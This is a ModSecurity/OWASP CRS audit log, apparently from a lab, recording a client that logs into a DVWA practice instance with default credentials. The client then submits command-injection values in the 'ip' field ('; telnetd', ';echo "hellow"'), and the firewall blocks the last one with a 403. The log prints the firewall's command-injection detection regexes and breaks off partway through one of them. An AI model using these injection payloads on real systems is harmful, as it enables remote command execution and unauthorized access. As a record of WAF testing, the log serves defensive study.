[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRczOn8AAQEAAAkXs@UAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":448,"p2":2424,"p3":111,"p4":911,"p5":90,"sr":20,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:32 --0400","transaction_id":"WRczQH8AAQEAAAkYuEcAAAAD","remote_address":"192.168.75.145","remote_port":56756,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"88"},"body":["username=admin&password=password&Login=Login&user_token=1906be74335ec24718b92c5fbc145c6d"]},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"index.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRczQH8AAQEAAAkYuEcAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":728,"p2":3497,"p3":101,"p4":165,"p5":68,"sr":21,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:32 --0400","transaction_id":"WRczQH8AAQEAAAkYuEgAAAAD","remote_address":"192.168.75.145","remote_port":56756,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/index.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"2725","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/index.php\"] [unique_id \"WRczQH8AAQEAAAkYuEgAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":656,"p2":2384,"p3":157,"p4":898,"p5":80,"sr":45,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:35 --0400","transaction_id":"WRczQ38AAQEAAAkYuEkAAAAD","remote_address":"192.168.75.145","remote_port":56756,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczQ38AAQEAAAkYuEkAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":638,"p2":2256,"p3":149,"p4":495,"p5":105,"sr":28,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:35 --0400","transaction_id":"WRczQ38AAQEAAAkYuEoAAAAD","remote_address":"192.168.75.145","remote_port":56756,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczQ38AAQEAAAkYuEoAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":614,"p2":2154,"p3":215,"p4":432,"p5":96,"sr":39,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:54 --0400","transaction_id":"WRczVn8AAQEAAAkZ0BAAAAAE","remote_address":"192.168.75.145","remote_port":56758,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"28"},"body":["ip=%3B+telnetd&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1408","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczVn8AAQEAAAkZ0BAAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":940,"p2":2340,"p3":158,"p4":734,"p5":106,"sr":27,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:59 --0400","transaction_id":"WRczW38AAQEAAAkVV4gAAAAA","remote_address":"192.168.75.145","remote_port":56760,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"31"},"body":["ip=%27%3B+telnetd&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1408","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczW38AAQEAAAkVV4gAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":638,"p2":2285,"p3":224,"p4":383,"p5":76,"sr":69,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:25:11 --0400","transaction_id":"WRczZ38AAQEAAAmHBJMAAAAF","remote_address":"192.168.75.145","remote_port":56762,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"37"},"body":["ip=%3Becho+%22hellow%22&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/exec/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
Pattern match \"(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\\".*\\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\\"]*(?:l[\\\\\\\\'\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ;echo \\x22hellow found within ARGS:ip: ;echo \\x22hellow\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Warning. Pattern match \"(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\\"\\\\s]*(?:[\\\\w'\\\"\\\\./]+/|[\\\\\\\\'\\\"\\\\^]*\\\\w[\\\\\\\\'\\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\\"/\\\\\\\\]*\\\\\\\\)?[\\\"\\\\^]*(?:m[\\\"\\\\^]*(?:y[\\\"\\\\^]*s[\\\"\\\\^]*q[\\\"\\\\^]*l(?:[\\\"\\\\^]*(?:d[\\\"\\\\^]*u[\\\"\\\\^]*m[\\\"\\\\^]*p(?:[\\\"\\\\^]*s[\\\"\\\\^ ...\" at ARGS:ip. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ;echo found within ARGS:ip: ;echo \\x22hellow\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczZ38AAQEAAAmHBJMAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\(|`|\\\\\\\\\\\\\\\\${|<\\\\\\\\\\\\\\\\(|>\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\))\\\\\\\\\\\\\\\\s*(?:{|\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\w+=(?:[^\\\\\\\\\\\\\\\\s]*|\\\\\\\\\\\\\\\\$.*|\\\\\\\\\\\\\\\\$.*|<.*|>.*|\\\\\\\\\\\\\\\\'.*\\\\\\\\\\\\\\\\'|\\\\\\\\\".*\\\\\\\\\")\\\\\\\\\\\\\\\\s+|!\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\$)*\\\\\\\\\\\\\\\\s*(?:'|\\\\\\\\\")*(?:[\\\\\\\\\\\\\\\\?\\\\\\\\\\\\\\\\*\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\)\\\\\\\\\\\\\\\\-\\\\\\\\\\\\\\\\|+\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\